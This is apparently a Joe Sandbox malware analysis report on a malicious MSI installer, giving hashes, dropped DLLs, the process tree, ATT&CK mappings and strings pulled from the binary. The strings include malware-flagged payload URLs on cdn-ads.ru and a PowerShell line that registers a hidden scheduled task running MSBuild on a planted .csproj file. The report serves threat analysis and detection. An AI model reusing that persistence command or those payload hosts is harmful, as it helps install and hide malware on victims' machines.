Edit tour

Windows Analysis Report
njYYgDgfwY.msi

Overview

General Information

Sample Name:	njYYgDgfwY.msi
Original Sample Name:	34299df68da85467e9e305c1e2d03695408c41a2c751e80a4f031ab8387d5105.msi
Analysis ID:	1296210
MD5:	56e45eb403cf192dc8bcef1826ca9bac
SHA1:	62836a9fc323f9c867bec3be7951182b44047f26
SHA256:	34299df68da85467e9e305c1e2d03695408c41a2c751e80a4f031ab8387d5105
Tags:	msi
Infos:

Detection

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected MalDoc

Antivirus detection for URL or domain

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Checks for available system drives (often done to infect USB drives)

Found dropped PE file which has not been started or loaded

Drops PE files

Tries to load missing DLLs

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 5140 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\njYYgDgfwY.msi" MD5: 4767B71A318E201188A0D0A420C8B608)

msiexec.exe (PID: 3108 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)

msiexec.exe (PID: 5488 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 5764F3C4CEC2E39CBFCBF2AA60C70B87 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
njYYgDgfwY.msi	JoeSecurity_MalDoc	Yara detected MalDoc	Joe Security

Binary or memory string: HKEY_USERSRegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1VMware20,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Replication Through Removable Media	Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Process Injection	OS Credential Dumping	1 Security Software Discovery	1 Replication Through Removable Media	Data from Local System	Exfiltration Over Other Network Medium	Data Obfuscation	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 DLL Side-Loading	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	11 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
njYYgDgfwY.msi	2%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\MSIE0A3.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIE1CD.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIE27A.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIE2C9.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIE328.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIE423.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIE481.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://ocsps.ssl.com0	0%	URL Reputation	safe
http://ocsps.ssl.com0	0%	URL Reputation	safe
https://prkl-ads.site?status=install	0%	Avira URL Cloud	safe
https://prkl-ads.site/?status=start&av=$Names	0%	Avira URL Cloud	safe
https://cdn-ads.ru/file/999.jpg	100%	Avira URL Cloud	malware
https://cdn-ads.ru/file/ProfessionalSingleLanguage.dat	100%	Avira URL Cloud	malware
https://prkl-ads.site?status=reg&key=yq3bv84gt7fysbvdifo&site=Carp_itch.io	0%	Avira URL Cloud	safe
https://cdn-ads.ru/file/999.jpg	1%	Virustotal		Browse
https://prkl-ads.site?status=reg&key=yq3bv84gt7fysbvdifo&site=Carp_itch.io	0%	Virustotal		Browse
https://prkl-ads.site/?status=start&av=$Names	1%	Virustotal		Browse
https://cdn-ads.ru/file/ProfessionalSingleLanguage.dat	0%	Virustotal		Browse

Name	Source	Malicious	Antivirus Detection	Reputation
http://ocsps.ssl.com0	njYYgDgfwY.msi	false	URL Reputation: safe URL Reputation: safe	unknown
http://crls.ssl.com/ssl.com-rsa-RootCA.crl0	njYYgDgfwY.msi	false		high
http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q	njYYgDgfwY.msi	false		high
https://prkl-ads.site/?status=start&av=$Names	njYYgDgfwY.msi	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://prkl-ads.site?status=install	njYYgDgfwY.msi	false	Avira URL Cloud: safe	unknown
https://cdn-ads.ru/file/ProfessionalSingleLanguage.dat	njYYgDgfwY.msi	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0	njYYgDgfwY.msi	false		high
https://cdn-ads.ru/file/999.jpg	njYYgDgfwY.msi	false	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.ssl.com/repository0	njYYgDgfwY.msi	false		high
https://prkl-ads.site?status=reg&key=yq3bv84gt7fysbvdifo&site=Carp_itch.io	njYYgDgfwY.msi	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1296210
Start date and time:	2023-08-23 23:44:08 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	njYYgDgfwY.msi
Original Sample Name:	34299df68da85467e9e305c1e2d03695408c41a2c751e80a4f031ab8387d5105.msi
Detection:	MAL
Classification:	mal56.troj.winMSI@4/8@0/0
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .msi

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, g.bing.com, arc.msn.com
Not all processes where analyzed, report is missing behavior information

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\MSIE0A3.tmp	Psiphon_3.179.msi	Get hash	malicious	HTMLPhisher	Browse
	q39Ns83JoJ.lnk	Get hash	malicious	NetSupport RAT	Browse
	Driver.Booster.10.6.0.141.msi	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\MSIE1CD.tmp	Psiphon_3.179.msi	Get hash	malicious	HTMLPhisher	Browse
	q39Ns83JoJ.lnk	Get hash	malicious	NetSupport RAT	Browse
	Driver.Booster.10.6.0.141.msi	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\MSIE0A3.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.4696654484377945
Encrypted:	false
SSDEEP:	6144:waFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOlKmN9ysU5pvs8g73iK:JYL9HXVW0xOA+KlZC4vA55s8g73iK
MD5:	A9941233B9415B479D3B4F3732161EAB
SHA1:	CB2D99AF52B3B1C712943B13E45D85C80C732E57
SHA-256:	CE34CC14E8D26119E1BF28A3A8368DA6E10D13851004E2675976C5AD58B122E2
SHA-512:	CFD6C425587E5E7C57B6F4655E2A48C871313E2BACF63CC0955CCAE1A384610644F26AA76BEE0A2A327CD77C2AE7DEF8EA9CB0C7C7C87FAB1C8196BAC82037F7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Psiphon_3.179.msi, Detection: malicious, Browse Filename: q39Ns83JoJ.lnk, Detection: malicious, Browse Filename: Driver.Booster.10.6.0.141.msi, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............u.u.u.L.v.u.L.p.4.u.;.q.u.;.v.u.;.p..u.L.q.u.L.s.u.L.t.u.t.!.u..\|...u..u.u...u...u..w.u.Rich..u.........PE..L......d.........."!...$.>...........Y.......P...............................0............@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIE1CD.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.4696654484377945
Encrypted:	false
SSDEEP:	6144:waFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOlKmN9ysU5pvs8g73iK:JYL9HXVW0xOA+KlZC4vA55s8g73iK
MD5:	A9941233B9415B479D3B4F3732161EAB
SHA1:	CB2D99AF52B3B1C712943B13E45D85C80C732E57
SHA-256:	CE34CC14E8D26119E1BF28A3A8368DA6E10D13851004E2675976C5AD58B122E2
SHA-512:	CFD6C425587E5E7C57B6F4655E2A48C871313E2BACF63CC0955CCAE1A384610644F26AA76BEE0A2A327CD77C2AE7DEF8EA9CB0C7C7C87FAB1C8196BAC82037F7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Psiphon_3.179.msi, Detection: malicious, Browse Filename: q39Ns83JoJ.lnk, Detection: malicious, Browse Filename: Driver.Booster.10.6.0.141.msi, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............u.u.u.L.v.u.L.p.4.u.;.q.u.;.v.u.;.p..u.L.q.u.L.s.u.L.t.u.t.!.u..\|...u..u.u...u...u..w.u.Rich..u.........PE..L......d.........."!...$.>...........Y.......P...............................0............@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIE27A.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.4696654484377945
Encrypted:	false
SSDEEP:	6144:waFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOlKmN9ysU5pvs8g73iK:JYL9HXVW0xOA+KlZC4vA55s8g73iK
MD5:	A9941233B9415B479D3B4F3732161EAB
SHA1:	CB2D99AF52B3B1C712943B13E45D85C80C732E57
SHA-256:	CE34CC14E8D26119E1BF28A3A8368DA6E10D13851004E2675976C5AD58B122E2
SHA-512:	CFD6C425587E5E7C57B6F4655E2A48C871313E2BACF63CC0955CCAE1A384610644F26AA76BEE0A2A327CD77C2AE7DEF8EA9CB0C7C7C87FAB1C8196BAC82037F7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............u.u.u.L.v.u.L.p.4.u.;.q.u.;.v.u.;.p..u.L.q.u.L.s.u.L.t.u.t.!.u..\|...u..u.u...u...u..w.u.Rich..u.........PE..L......d.........."!...$.>...........Y.......P...............................0............@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIE2C9.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.4696654484377945
Encrypted:	false
SSDEEP:	6144:waFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOlKmN9ysU5pvs8g73iK:JYL9HXVW0xOA+KlZC4vA55s8g73iK
MD5:	A9941233B9415B479D3B4F3732161EAB
SHA1:	CB2D99AF52B3B1C712943B13E45D85C80C732E57
SHA-256:	CE34CC14E8D26119E1BF28A3A8368DA6E10D13851004E2675976C5AD58B122E2
SHA-512:	CFD6C425587E5E7C57B6F4655E2A48C871313E2BACF63CC0955CCAE1A384610644F26AA76BEE0A2A327CD77C2AE7DEF8EA9CB0C7C7C87FAB1C8196BAC82037F7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............u.u.u.L.v.u.L.p.4.u.;.q.u.;.v.u.;.p..u.L.q.u.L.s.u.L.t.u.t.!.u..\|...u..u.u...u...u..w.u.Rich..u.........PE..L......d.........."!...$.>...........Y.......P...............................0............@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIE328.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.4696654484377945
Encrypted:	false
SSDEEP:	6144:waFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOlKmN9ysU5pvs8g73iK:JYL9HXVW0xOA+KlZC4vA55s8g73iK
MD5:	A9941233B9415B479D3B4F3732161EAB
SHA1:	CB2D99AF52B3B1C712943B13E45D85C80C732E57
SHA-256:	CE34CC14E8D26119E1BF28A3A8368DA6E10D13851004E2675976C5AD58B122E2
SHA-512:	CFD6C425587E5E7C57B6F4655E2A48C871313E2BACF63CC0955CCAE1A384610644F26AA76BEE0A2A327CD77C2AE7DEF8EA9CB0C7C7C87FAB1C8196BAC82037F7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............u.u.u.L.v.u.L.p.4.u.;.q.u.;.v.u.;.p..u.L.q.u.L.s.u.L.t.u.t.!.u..\|...u..u.u...u...u..w.u.Rich..u.........PE..L......d.........."!...$.>...........Y.......P...............................0............@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIE423.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1126208
Entropy (8bit):	6.47547142761303
Encrypted:	false
SSDEEP:	24576:tBbmgYewSBprKpygTqkg0z/f2sbQEiwiUt52wD5YqQc3w0RZqTkqMUM0zVQZo:tBflKp/Dz/f2sbQEidUt52Q5hz3w0RZI
MD5:	821A9095657D59C7CD66C28B3FD50ACE
SHA1:	AEF8A82D7D3DF689AF403BD0CCAB7ED04EC77609
SHA-256:	D5411A4C65860343B846D5503686181D3487CC324FC0562B4E5F3CD1662B80FE
SHA-512:	A885068D950307F1ABCF08DF41D3476174F02641105707EF3B81515D84F0F305DE84F6EA900421D250011EBFD4F3AFC1498CC4F3B14040E536CCB27FF6214C06
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J"..+L..+L..+L..YO..+L..YI.z+L.kUH..+L.kUO..+L.kUI..+L..YH..+L..YM..+L..+M..*L..TE..+L..TL..+L..T...+L..+..+L..TN..+L.Rich.+L.........PE..L......d.........."!...$.t..........0u.......................................P......(.....@.........................`...t...............................@=.......A.../..p....................0..........@...............4............................text...^s.......t.................. ..`.rdata...U.......V...x..............@..@.data...8...........................@....rsrc...............................@..@.reloc...A.......B..................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIE481.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.4696654484377945
Encrypted:	false
SSDEEP:	6144:waFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOlKmN9ysU5pvs8g73iK:JYL9HXVW0xOA+KlZC4vA55s8g73iK
MD5:	A9941233B9415B479D3B4F3732161EAB
SHA1:	CB2D99AF52B3B1C712943B13E45D85C80C732E57
SHA-256:	CE34CC14E8D26119E1BF28A3A8368DA6E10D13851004E2675976C5AD58B122E2
SHA-512:	CFD6C425587E5E7C57B6F4655E2A48C871313E2BACF63CC0955CCAE1A384610644F26AA76BEE0A2A327CD77C2AE7DEF8EA9CB0C7C7C87FAB1C8196BAC82037F7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............u.u.u.L.v.u.L.p.4.u.;.q.u.;.v.u.;.p..u.L.q.u.L.s.u.L.t.u.t.!.u..\|...u..u.u...u...u..w.u.Rich..u.........PE..L......d.........."!...$.>...........Y.......P...............................0............@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIbe4aa.LOG

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	196
Entropy (8bit):	3.427195070813476
Encrypted:	false
SSDEEP:	3:QxtP6nElClDg+OjmlH/wlRlX+PpJlmnmf2KXMFmNlvMltlGcdUwlI1:QOnElClDHOjSfwRmlv2K80ElXHUww
MD5:	1C9C4B1E5DA2A4FF28A13A1394910C14
SHA1:	D4D0DC3723D1F4AA61A762DFBE799B01E2048ABB
SHA-256:	D1D6DC53F0ED2B795D553568051C382F60CF4FB7C0C252C365CAB8DDD97520F5
SHA-512:	CC13EE9396E0C57B682AF958276C5CFFD1927B05EE4377CBFA28306E43BA227A0F3BBF38E071BC5324E66FE17E12565A7FBC416388881C4380B66711DECD90D0
Malicious:	false
Preview:	..T.h.i.s. .p.a.c.k.a.g.e. .c.a.n. .o.n.l.y. .b.e. .r.u.n. .f.r.o.m. .a. .b.o.o.t.s.t.r.a.p.p.e.r.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .8./.2.3./.2.0.2.3. . .2.3.:.4.5.:.0.9. .=.=.=.....

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, MSI Installer, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {76B567E7-FDCC-430C-9607-4691A42D7D75}, Subject: Debt, Author: Debt, Name of Creating Application: Debt, Template: ;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Sat Aug 19 18:56:14 2023, Number of Pages: 200, Last Saved By: Tatyana, Last Printed: Wed Aug 23 21:37:32 2023, Number of Words: 4
Entropy (8bit):	6.502949323611609
TrID:	Microsoft Windows Installer (60509/1) 88.31% Generic OLE2 / Multistream Compound File (8008/1) 11.69%
File name:	njYYgDgfwY.msi
File size:	4'120'576 bytes
MD5:	56e45eb403cf192dc8bcef1826ca9bac
SHA1:	62836a9fc323f9c867bec3be7951182b44047f26
SHA256:	34299df68da85467e9e305c1e2d03695408c41a2c751e80a4f031ab8387d5105
SHA512:	282578b6f87bd84851e20e02b7239db730c90531aa395e795867b5874c5540fa056f0e0fd4a69d8e2d8006315693e69a10ae8028e99f638eeb55a93e1d06bcca
SSDEEP:	98304:RqAsEXP+uKTFn+XA4vBflMPzidUtR81n/8/Ot:kozBfMn0/5
TLSH:	37167C21B59AC136E67F4371A92CEB6B25797FB12B7344DB63E439AE0D704C11232E12
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Target ID:	0
Start time:	23:45:01
Start date:	23/08/2023
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\njYYgDgfwY.msi"
Imagebase:	0x7ff77d410000
File size:	66'048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	23:45:02
Start date:	23/08/2023
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff77d410000
File size:	66'048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	23:45:02
Start date:	23/08/2023
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 5764F3C4CEC2E39CBFCBF2AA60C70B87 C
Imagebase:	0x290000
File size:	59'904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Source: https://cdn-ads.ru/file/999.jpg	Avira URL Cloud: Label: malware
Source: https://cdn-ads.ru/file/ProfessionalSingleLanguage.dat	Avira URL Cloud: Label: malware

Source: njYYgDgfwY.msi	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: njYYgDgfwY.msi	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: njYYgDgfwY.msi	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: njYYgDgfwY.msi	String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q
Source: njYYgDgfwY.msi	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: njYYgDgfwY.msi	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: njYYgDgfwY.msi	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: njYYgDgfwY.msi	String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
Source: njYYgDgfwY.msi	String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: njYYgDgfwY.msi	String found in binary or memory: http://ocsp.digicert.com0A
Source: njYYgDgfwY.msi	String found in binary or memory: http://ocsp.digicert.com0C
Source: njYYgDgfwY.msi	String found in binary or memory: http://ocsp.digicert.com0X
Source: njYYgDgfwY.msi	String found in binary or memory: http://ocsps.ssl.com0
Source: njYYgDgfwY.msi	String found in binary or memory: https://cdn-ads.ru/file/999.jpg
Source: njYYgDgfwY.msi	String found in binary or memory: https://cdn-ads.ru/file/ProfessionalSingleLanguage.dat
Source: njYYgDgfwY.msi	String found in binary or memory: https://prkl-ads.site/?status=start&av=$Names
Source: njYYgDgfwY.msi	String found in binary or memory: https://prkl-ads.site?status=install
Source: njYYgDgfwY.msi	String found in binary or memory: https://prkl-ads.site?status=reg&key=yq3bv84gt7fysbvdifo&site=Carp_itch.io
Source: njYYgDgfwY.msi	String found in binary or memory: https://www.ssl.com/repository0

Source: njYYgDgfwY.msi	Binary or memory string: OriginalFilenamePrereq.dllF vs njYYgDgfwY.msi
Source: njYYgDgfwY.msi	Binary or memory string: OriginalFilenameviewer.exeF vs njYYgDgfwY.msi
Source: njYYgDgfwY.msi	Binary or memory string: OriginalFilenameAICustAct.dllF vs njYYgDgfwY.msi
Source: njYYgDgfwY.msi	Binary or memory string: OriginalFilenamelzmaextractor.dllF vs njYYgDgfwY.msi
Source: njYYgDgfwY.msi	Binary or memory string: OriginalFilenameSoftwareDetector.dllF vs njYYgDgfwY.msi
Source: njYYgDgfwY.msi	Binary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs njYYgDgfwY.msi

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\njYYgDgfwY.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5764F3C4CEC2E39CBFCBF2AA60C70B87 C
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5764F3C4CEC2E39CBFCBF2AA60C70B87 C	Jump to behavior

Source: njYYgDgfwY.msi	Binary or memory string: $filePath = Join-Path $env:USERPROFILE ".steam\steam_$xxx.csproj"
Source: njYYgDgfwY.msi	Binary or memory string: $action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden -Command `"& C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe $env:USERPROFILE\.steam\steam_$xxx.csproj /t:$xxx`""

Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: njYYgDgfwY.msi
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdbg source: njYYgDgfwY.msi
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: njYYgDgfwY.msi
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb} source: njYYgDgfwY.msi
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: njYYgDgfwY.msi
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbm source: njYYgDgfwY.msi, MSIE423.tmp.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: njYYgDgfwY.msi, MSIE423.tmp.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: njYYgDgfwY.msi
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: njYYgDgfwY.msi, MSIE328.tmp.0.dr, MSIE2C9.tmp.0.dr, MSIE0A3.tmp.0.dr, MSIE27A.tmp.0.dr, MSIE1CD.tmp.0.dr, MSIE481.tmp.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: njYYgDgfwY.msi

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
